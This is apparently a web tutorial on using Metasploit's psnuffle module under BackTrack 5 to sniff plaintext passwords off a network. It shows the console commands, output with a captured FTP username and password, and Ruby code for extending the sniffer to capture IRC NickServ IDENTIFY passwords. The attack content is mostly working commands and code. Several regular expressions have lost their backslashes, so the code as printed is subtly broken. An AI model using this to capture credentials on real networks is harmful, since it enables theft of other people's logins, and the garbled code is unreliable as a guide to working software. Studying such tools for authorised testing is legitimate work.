Metasploit Framework (MSF) with BackTrack 5 WhySoSeriousssssssssssss rwxr-xr-x 0 22:50

Filename	Metasploit Framework (MSF) with BackTrack 5
Permission	rw-r--r--
Author	WhySoSeriousssssssssssss
Date and Time	22:50
Label
Action

The Metasploit Framework (MSF) is one of the most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The Metasploit Framework (MSF) is far more than just a collection of exploits. It is an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment and not have to reinvent the wheel.

Password Sniffing

Max Moser released a Metasploit password sniffing module named psnuffle that will sniff passwords off the wire similar to the tool dsniff. It currently supports pop3, imap, ftp, and HTTP GET. You can read more about the module on Max's Blog at http://remote-exploit.blogspot.com/2009/08/psnuffle-password-sniffer-for.html


Using the psnuffle module is extremely simple. There are some options available but the module works great "out of the box".

msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all".
RHOST yes The target address
SNAPLEN 65535 yes The number of bytes to capture
TIMEOUT 1 yes The number of seconds to wait for new data


As you can see the only mandatory option that requires your action is RHOST. There are also some options available, including the ability to import a PCAP capture file. You must run the scanner in its default mode.

msf auxiliary(psnuffle) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf auxiliary(psnuffle) > run
[*] Auxiliary module running as background job
[*] Loaded protocol FTP from /pentest/exploits/framework3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /pentest/exploits/framework3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /pentest/exploits/framework3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /pentest/exploits/framework3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Com 3CDaemon FTP Server Version 2.0)

You've captured a successful FTP login. This is an excellent tool for passive information gathering.

Password Sniffing with Psnuffle

Psnuffle is easy to extend due to its modular design. This section is about the process of developing an IRC (Internet Relay Chat) protocol sniffer (Notify and Nick messages).


Module Location

All the different modules are located in data - exploits - psnuffle. The names are corresponding to the protocol names used inside psnuffle. To develop our your module, take a look at the important parts of the existing pop3 sniffer module as a template.

Pattern definitions:

self.sigs = {
:ok => /^(+OK[^n]*)n/si,
:err => /^(-ERR[^n]*)n/si,
:user => /^USERs+([^n]+)n/si,
:pass => /^PASSs+([^n]+)n/si,
:quit => /^(QUITs*[^n]*)n/si }


This section defines the expression patterns which will be used during sniffing to identify interesting data. Regular expressions look very strange at the beginning but are very powerful. In short everything within () will be available within a variable later on in the script.

self.sigs = {
:user => /^(NICKs+[^n]+)/si,
:pass => /b(IDENTIFYs+[^n]+)/si,}

For IRC this section would look like the ones above. Not all nickservers are using IDENTIFY to send the password but the one on freenode does.


Session definition

For every module you first have to define what ports it should handle and how the session should be tracked.

return if not pkt[:tcp] # You don't want to handle anything other than tcp
return if (pkt[:tcp].src_port != 6667 and pkt[:tcp].dst_port != 6667) # Process only packet on port 6667

#Ensure that the session hash stays the same for both way of communication

if (pkt[:tcp].dst_port == 6667) # When packet is sent to server
s = find_session("#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}")
else # When packet is coming from the server
s = find_session("#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}")
end


Now that you have a session object that uniquely consolidates info, you can go on and process packet content that matched one of the regular expressions you defined earlier.

case matched
when :user # when the pattern "/^(NICKs+[^n]+)/si" is matching the packet content
s[:user]=matches #Store the name into the session hash s for later use
# Do whatever you like here... maybe a puts if you need to
when :pass # When the pattern "/b(IDENTIFYs+[^n]+)/si" is matching
s[:pass]=matches # Store the password into the session hash s as well
if (s[:user] and s[:pass]) # When we have the name and the pass sniffed, print it
print "-> IRC login sniffed: #{s[:session]} >> username:#{s[:user]} password:#{s[:pass]}n"
end
sessions.delete(s[:session]) # Remove this session because we dont need to track it anymore
when nil
# No matches, don't do anything else # Just in case anything else is matching...
sessions[s[:session]].merge!({k => matches}) # Just add it to the session object end